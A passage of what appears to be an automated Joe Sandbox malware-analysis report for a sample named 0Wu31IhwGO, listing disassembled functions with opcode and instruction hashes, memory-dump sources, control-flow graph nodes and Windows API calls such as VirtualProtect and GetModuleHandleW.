                                                              • Opcode Fuzzy Hash: 2af09a683b995a5eb53edb3e9da3390b9a97a9418e1cc0c53ae28d0140c6dbca
                                                              • Instruction Fuzzy Hash: E27159B4E1520ADFDB04CFA5D9424AEFBB6FF89201F10D46AD019E7294DB389A01CF54
                                                              Function 0737BC58 Relevance: 1.4, Strings: 1, Instructions: 176COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 5=6
                                                              • API String ID: 0-2897083178
                                                              • Opcode ID: b8652289bf41e3522874fe4b5345c3f44bc5cc37aed7a952fd0703eeca38d14f
                                                              • Instruction ID: f749d0fe369b9aa4b92ffbd6e35e34c2e6461d0e67cd9fe8213a8be231d6477f
                                                              • Opcode Fuzzy Hash: b8652289bf41e3522874fe4b5345c3f44bc5cc37aed7a952fd0703eeca38d14f
                                                              • Instruction Fuzzy Hash: F9615AB4E1520ADFDB04CFA5D9414AEFBB6FF89201F10D56AD019E7294DB389A00CF54
                                                              Function 07374BA0 Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: -2m
                                                              • API String ID: 0-2686427999
                                                              • Opcode ID: 268db0855c5b6da50bd70c893d209264dcb802e6215b767438dfc9b8177a259e
                                                              • Instruction ID: ac18694ec0b6381f73eb2693c4c77f08f65482cabf54982e32d8e7de0d18e9ab
                                                              • Opcode Fuzzy Hash: 268db0855c5b6da50bd70c893d209264dcb802e6215b767438dfc9b8177a259e
                                                              • Instruction Fuzzy Hash: 46515AB4E042599FEB08CFAAD4806AEFBF2EF89300F24D06AD459B7255D7385940CB65
                                                              Function 0737DB80 Relevance: .3, Instructions: 254COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0b6e538d2b5014ca62a7e063678e7969288ee7ae686c23aed2b58e2df866f6cf
                                                              • Instruction ID: 756a5b7cbb70c2e9ee4f69481a097a3cadb1690738721e22627f437d5ecbc92c
                                                              • Opcode Fuzzy Hash: 0b6e538d2b5014ca62a7e063678e7969288ee7ae686c23aed2b58e2df866f6cf
                                                              • Instruction Fuzzy Hash: E9B118B0E15209DFDB28CFA6D98059EFBB6FF89300F24D42AD419A7654D7349A06CF50
                                                              Function 0737DB70 Relevance: .3, Instructions: 252COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1841dc9b069ad72a0fd371dbe2692aa2cf962c90a1cda5414072831f4c51e9a6
                                                              • Instruction ID: a6bb2a80bd181d45d93ea52139292f4751982453ad68fe6ab7463adf4a17ac08
                                                              • Opcode Fuzzy Hash: 1841dc9b069ad72a0fd371dbe2692aa2cf962c90a1cda5414072831f4c51e9a6
                                                              • Instruction Fuzzy Hash: F7B129B0E15209DFDB28CFA6D98059EFBB2FF89300F24D42AD419A7654D7749A02CF50
                                                              Function 073755D9 Relevance: .1, Instructions: 76COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aed24af2639f6f7561dfe502543726340a21032866dc5529e2e7ea5bcb24263b
                                                              • Instruction ID: 9ace0ebcf611817762fd32b08e9ac5516eade8259786260cd72115daa08ef55c
                                                              • Opcode Fuzzy Hash: aed24af2639f6f7561dfe502543726340a21032866dc5529e2e7ea5bcb24263b
                                                              • Instruction Fuzzy Hash: D03127B1E016188BEB18CFAAD8506DEBBB7BFC9310F14C06AD409AA264DB355955CF80
                                                              Function 07373758 Relevance: .1, Instructions: 65COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2bae362633f033e14253795c7e3ce89fb1760180700ffc0313358bb586e1e90d
                                                              • Instruction ID: af8d8f75485a2eee64bf024f836d4a9e7d8eae756f33e97832cc3e63ef395c7d
                                                              • Opcode Fuzzy Hash: 2bae362633f033e14253795c7e3ce89fb1760180700ffc0313358bb586e1e90d
                                                              • Instruction Fuzzy Hash: 9A1129F2E056489BEB18CFABD80529EBBF7EFCA211F14C0A6C41CA6214EB740541CB51
                                                              Function 00EAD1C8 Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 294 ead1c8-ead267 GetCurrentProcess 298 ead269-ead26f 294->298 299 ead270-ead2a4 GetCurrentThread 294->299 298->299 300 ead2ad-ead2e1 GetCurrentProcess 299->300 301 ead2a6-ead2ac 299->301 303 ead2ea-ead305 call ead3a8 300->303 304 ead2e3-ead2e9 300->304 301->300 306 ead30b-ead33a GetCurrentThreadId 303->306 304->303 308 ead33c-ead342 306->308 309 ead343-ead3a5 306->309 308->309
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 00EAD256
                                                              • GetCurrentThread.KERNEL32 ref: 00EAD293
                                                              • GetCurrentProcess.KERNEL32 ref: 00EAD2D0
                                                              • GetCurrentThreadId.KERNEL32 ref: 00EAD329
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675618718.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ea0000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: df9d7754f74d9d3d81b429f385e8d5a09d0ff81405883690891efb9be805afbc
                                                              • Instruction ID: dcc26e55c1ed70ab57e1a7d7a3c6753d80b9082eb54791af1b86e19944f06c2c
                                                              • Opcode Fuzzy Hash: df9d7754f74d9d3d81b429f385e8d5a09d0ff81405883690891efb9be805afbc
                                                              • Instruction Fuzzy Hash: BE5176B0904209CFDB14CFAAD948BDEBBF1FF88314F208459E019A7361DB74A944CB61
                                                              Function 00EAD1D8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 316 ead1d8-ead267 GetCurrentProcess 320 ead269-ead26f 316->320 321 ead270-ead2a4 GetCurrentThread 316->321 320->321 322 ead2ad-ead2e1 GetCurrentProcess 321->322 323 ead2a6-ead2ac 321->323 325 ead2ea-ead305 call ead3a8 322->325 326 ead2e3-ead2e9 322->326 323->322 328 ead30b-ead33a GetCurrentThreadId 325->328 326->325 330 ead33c-ead342 328->330 331 ead343-ead3a5 328->331 330->331
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 00EAD256
                                                              • GetCurrentThread.KERNEL32 ref: 00EAD293
                                                              • GetCurrentProcess.KERNEL32 ref: 00EAD2D0
                                                              • GetCurrentThreadId.KERNEL32 ref: 00EAD329
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675618718.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ea0000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: 2b430e5089425c60ccc3ca30a2d424f01bcf9c1527f9746a301399c42b94f8cf
                                                              • Instruction ID: 9c92c4ea095b55fd6b52deda1fd40c6a6a8474e6227ee0e81fb97b23ee951c65
                                                              • Opcode Fuzzy Hash: 2b430e5089425c60ccc3ca30a2d424f01bcf9c1527f9746a301399c42b94f8cf
                                                              • Instruction Fuzzy Hash: AE5145B0904209CFDB55DFAAD948B9EBBF1FF88314F208459E019B7360DB74A944CB65
                                                              Function 00EAB209 Relevance: 1.7, APIs: 1, Instructions: 208COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 883 eab209-eab237 884 eab239-eab246 call ea9d9c 883->884 885 eab263-eab267 883->885 890 eab248 884->890 891 eab25c 884->891 887 eab27b-eab2bc 885->887 888 eab269-eab273 885->888 894 eab2c9-eab2d7 887->894 895 eab2be-eab2c6 887->895 888->887 938 eab24e call eab4c0 890->938 939 eab24e call eab4b0 890->939 891->885 896 eab2fb-eab2fd 894->896 897 eab2d9-eab2de 894->897 895->894 902 eab300-eab307 896->902 899 eab2e9 897->899 900 eab2e0-eab2e7 call ea9da8 897->900 898 eab254-eab256 898->891 901 eab398-eab458 898->901 904 eab2eb-eab2f9 899->904 900->904 933 eab45a-eab45d 901->933 934 eab460-eab48b GetModuleHandleW 901->934 905 eab309-eab311 902->905 906 eab314-eab31b 902->906 904->902 905->906 908 eab328-eab331 call ea9db8 906->908 909 eab31d-eab325 906->909 914 eab33e-eab343 908->914 915 eab333-eab33b 908->915 909->908 916 eab361-eab36e 914->916 917 eab345-eab34c 914->917 915->914 924 eab370-eab38e 916->924 925 eab391-eab397 916->925 917->916 919 eab34e-eab35e call ea9dc8 call eaae14 917->919 919->916 924->925 933->934 935 eab48d-eab493 934->935 936 eab494-eab4a8 934->936 935->936 938->898 939->898
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00EAB47E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675618718.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ea0000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: ad7852e7ecdb63416740bb4728f1823603e427221a001dd53e0741e14c9ae309
                                                              • Instruction ID: 1d83393d7b1bbddec3a29a4173b5fa6a0d7216e01a6f4df35816d5ac484aead1
                                                              • Opcode Fuzzy Hash: ad7852e7ecdb63416740bb4728f1823603e427221a001dd53e0741e14c9ae309
                                                              • Instruction Fuzzy Hash: D6816670A00B458FDB24DF69D05579ABBF1FF89304F00892AD48AEBA52D774F849CB91
                                                              Function 00EA449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 940 ea449c-ea59b9 CreateActCtxA 943 ea59bb-ea59c1 940->943 944 ea59c2-ea5a1c 940->944 943->944 951 ea5a2b-ea5a2f 944->951 952 ea5a1e-ea5a21 944->952 953 ea5a40 951->953 954 ea5a31-ea5a3d 951->954 952->951 956 ea5a41 953->956 954->953 956->956
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 00EA59A9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675618718.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ea0000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 023bb9baf2028672d759734ef19a2a1ba1de831e6e1bc2ea096b007746b8563a
                                                              • Instruction ID: 698e0230cc1491ca6cc16816a77d68f1c4e4d6111f440621e07487ca3add203a
                                                              • Opcode Fuzzy Hash: 023bb9baf2028672d759734ef19a2a1ba1de831e6e1bc2ea096b007746b8563a
                                                              • Instruction Fuzzy Hash: 8341C1B1D00719CBDB24DFA9C884B9EBBF5BF89304F20816AD409BB251DB756945CF90
                                                              Function 00EA58ED Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 00EA59A9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675618718.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ea0000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: a57fb7fd5ab04e2dbd4b64d3fea5cebcf32e899b025b1d76fa8cd3db3585b124
                                                              • Instruction ID: a1b556ec07379213329ed8b9e154d004b7bfbc71c642051c18f1f8b498406104
                                                              • Opcode Fuzzy Hash: a57fb7fd5ab04e2dbd4b64d3fea5cebcf32e899b025b1d76fa8cd3db3585b124
                                                              • Instruction Fuzzy Hash: B641E0B1D00719CEDB24CFA9C884B9EBBB5BF89304F20815AD408BB261DB756945CF90
                                                              Function 00EAD828 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EAD8AF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675618718.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ea0000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: bb8a9af93a8d97dfa2c015bfbcfe533c7f9fd26582544f2b170e05e5674a9c9a
                                                              • Instruction ID: 71daa75f1b358fa3dcdaa75a6ac2ea2b052beb99ca8cf852f5c3953b7c1d6733
                                                              • Opcode Fuzzy Hash: bb8a9af93a8d97dfa2c015bfbcfe533c7f9fd26582544f2b170e05e5674a9c9a
                                                              • Instruction Fuzzy Hash: 5F21B3B5900249DFDB10CF9AD984ADEFBF8FB48320F14841AE914A7350D379A944DFA5
                                                              Function 00EAD823 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EAD8AF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675618718.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ea0000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 650ed70a2cbddd9603c3d9a66a45acc5b53aa3537dd6b6c17105aeced33921f7
                                                              • Instruction ID: 2d7168ded5e2f5f036661cb656163c2164f371675e293cffd1975f979484f5db
                                                              • Opcode Fuzzy Hash: 650ed70a2cbddd9603c3d9a66a45acc5b53aa3537dd6b6c17105aeced33921f7
                                                              • Instruction Fuzzy Hash: DA21E0B5900248DFDB10CFA9D985AEEBBF4FB48320F14845AE958A7210D378A944DFA0
                                                              Function 0737B468 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0737B4E3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: 7ee9c4932a6df1f3ac91ce28a2af192b701f959e313783fd57bc059886ac3b03
                                                              • Instruction ID: ca4a411e4afb59fc077a76ca76fa91e7e4303d114ee34341890259efed335957
                                                              • Opcode Fuzzy Hash: 7ee9c4932a6df1f3ac91ce28a2af192b701f959e313783fd57bc059886ac3b03
                                                              • Instruction Fuzzy Hash: 2B214AB5800219DFDB20CF9AC885BDEFBF4FB48320F108029E458A7251D778A544CFA1
                                                              Function 0737B470 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0737B4E3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: 21722a59abbfd042e918ed81bfdd6a07ddcdaccafbe872fa2001d6fe88fc650a
                                                              • Instruction ID: 40939d1d6b16dad9a0a2d7568e3f734bf83f1058131ee1d079141c8fe0f2fb85
                                                              • Opcode Fuzzy Hash: 21722a59abbfd042e918ed81bfdd6a07ddcdaccafbe872fa2001d6fe88fc650a
                                                              • Instruction Fuzzy Hash: 8B2117B5900259DFDB20CF9AC885BDEFBF4FB48320F108429E958A7251D778A544CFA1
                                                              Function 00EAB418 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00EAB47E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675618718.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ea0000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: bd693189a51c04780dedd3d01f3a3ac461c2099982c477cc2c71ffb25b751fd6
                                                              • Instruction ID: 05dbc774677f06ff40a7f9c0ef4c8abdfe89afd4bfa5594b3265bff1589ba1c9
                                                              • Opcode Fuzzy Hash: bd693189a51c04780dedd3d01f3a3ac461c2099982c477cc2c71ffb25b751fd6
                                                              • Instruction Fuzzy Hash: DD11DFB6C003498FCB20CF9AC844A9EFBF8EB89324F14845AD429B7211D379A545CFA1
                                                              Function 00E4D4C4 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675298271.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e4d000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d514ff98c518782a048041856f74212ca0a1a2e8470bfcaab9c1327e3aa05727
                                                              • Instruction ID: b2311458e25760f28a515cd9cff664c96b66a88e60ef210ecf4c0f20ec1fbcf6
                                                              • Opcode Fuzzy Hash: d514ff98c518782a048041856f74212ca0a1a2e8470bfcaab9c1327e3aa05727
                                                              • Instruction Fuzzy Hash: D8212571608240DFCB05DF14EDC0B26BF65FB98328F24C569E9092B256C73AD816CAA1
                                                              Function 00E5D1D4 Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675357122.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e5d000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bb9115cd66fd9349b955ae4fc0913eff8715c91c995b4d68eca6fd9950698e21
                                                              • Instruction ID: e4e07b82e3eca14a8330504c2eb9feee96ec3887934b5c8b34b88eab19333e5c
                                                              • Opcode Fuzzy Hash: bb9115cd66fd9349b955ae4fc0913eff8715c91c995b4d68eca6fd9950698e21
                                                              • Instruction Fuzzy Hash: DD213779508300DFCB21DF54DDC0B26BB65FB84319F20C96DDC095B266C336D84ACA61
                                                              Function 00E5D01C Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675357122.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e5d000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 339eb892ac3bcf322a46a5416b92466146356b0bcae326c6675bfa531c64ea36
                                                              • Instruction ID: 399072fe606c36812b3e6966c483443464d89abf31faa40985d555bcbbfbddfd
                                                              • Opcode Fuzzy Hash: 339eb892ac3bcf322a46a5416b92466146356b0bcae326c6675bfa531c64ea36
                                                              • Instruction Fuzzy Hash: 7F21F575508200DFDB25DF14D9C4B16BB66EB84325F24C96DDD095B296C33AD80BCA61
                                                              Function 00E5D005 Relevance: .1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675357122.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e5d000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0bd6bf657ea5ffab311917efd228434294f2b82b6dbe2e00d7a97e3b66afadc7
                                                              • Instruction ID: a675fb932a6f8cffe095da753e2f51955db23d77821dfee34f62fbccc3963d87
                                                              • Opcode Fuzzy Hash: 0bd6bf657ea5ffab311917efd228434294f2b82b6dbe2e00d7a97e3b66afadc7
                                                              • Instruction Fuzzy Hash: 2921537550D3808FDB12CF24D994715BF71EB46314F28C5EAD8498B6A7C33A980ACB62
                                                              Function 00E4D4BF Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675298271.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e4d000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                              • Instruction ID: a1be955d5a2c75da814e59574d06534de2fb9e28d0cf4d7488dddf0703b8a33f
                                                              • Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                              • Instruction Fuzzy Hash: 6511E676504280CFCB16CF14E9C4B16BF71FB94328F24C6A9D8495B656C33AD85ACBA1
                                                              Function 00E5D1CF Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675357122.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e5d000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                              • Instruction ID: 204ad29bc033c4aa8fd64bb592c05d7892b09bde77a69fdf01ccc598810d75e0
                                                              • Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                              • Instruction Fuzzy Hash: A611BE79508240DFCB12CF50C9C4B15BB61FB84318F24CAADDC495B266C33AD85ACB51
                                                              Function 00E4D745 Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675298271.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e4d000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5b51a760295dd222e58652c8b4fc5a37a72ae770765ca707616137d77ee023bf
                                                              • Instruction ID: d3f383f7276cabebaf9d67299aa99703076a78096fe48b7e9f63c20be4f49863
                                                              • Opcode Fuzzy Hash: 5b51a760295dd222e58652c8b4fc5a37a72ae770765ca707616137d77ee023bf
                                                              • Instruction Fuzzy Hash: 5F012B7100C3409AE7108F15DDCCB66FF98DF41334F18C51BFD085A286D2399840C6B1
                                                              Function 00E4D744 Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675298271.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e4d000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 74aac38548db300a600a2218da458f29ff13472e88dc47fdde34e2ffc9e5557c
                                                              • Instruction ID: 5ef937a78098bf81e1f429fc763648aacfbfac74e5775a980e15540c00195475
                                                              • Opcode Fuzzy Hash: 74aac38548db300a600a2218da458f29ff13472e88dc47fdde34e2ffc9e5557c
                                                              • Instruction Fuzzy Hash: D6F062724083449EEB108E15DDC8B62FF98EB51738F18C45BFD085A686C2799844CBB1

                                                              Non-executed Functions

                                                              Function 0737E130 Relevance: 1.6, Strings: 1, Instructions: 325COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: {#L
                                                              • API String ID: 0-1361971085
                                                              • Opcode ID: d1cc5dba75a7031786a64379e9bbf3b3d605f1c5f823d73960ac8f01e9d87794
                                                              • Instruction ID: 597c6e1125e443150ab9104aff231bdd751988f32e1ecd6b89a5c54124cb56fc
                                                              • Opcode Fuzzy Hash: d1cc5dba75a7031786a64379e9bbf3b3d605f1c5f823d73960ac8f01e9d87794
                                                              • Instruction Fuzzy Hash: DED136B0E14219CFDB18CFAAD98149EFBF6BF89340F14D56AD419AB264D7349902CF50
                                                              Function 0737E120 Relevance: 1.6, Strings: 1, Instructions: 322COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: {#L
                                                              • API String ID: 0-1361971085
                                                              • Opcode ID: b9d7dc2ea90dd955f9201f5e03dc9c84adc8aa7c35d408a999931818a1829612
                                                              • Instruction ID: 1429c9ff5edd4c5c0d8d040070b488b4aa2af0cda4baaeacac82d9a123379b72
                                                              • Opcode Fuzzy Hash: b9d7dc2ea90dd955f9201f5e03dc9c84adc8aa7c35d408a999931818a1829612
                                                              • Instruction Fuzzy Hash: 5BD127B0E14219CFDB18CFAAD98149EFBF6BF89340F14D5AAD419AB264D7349902CF50
                                                              Function 07375039 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
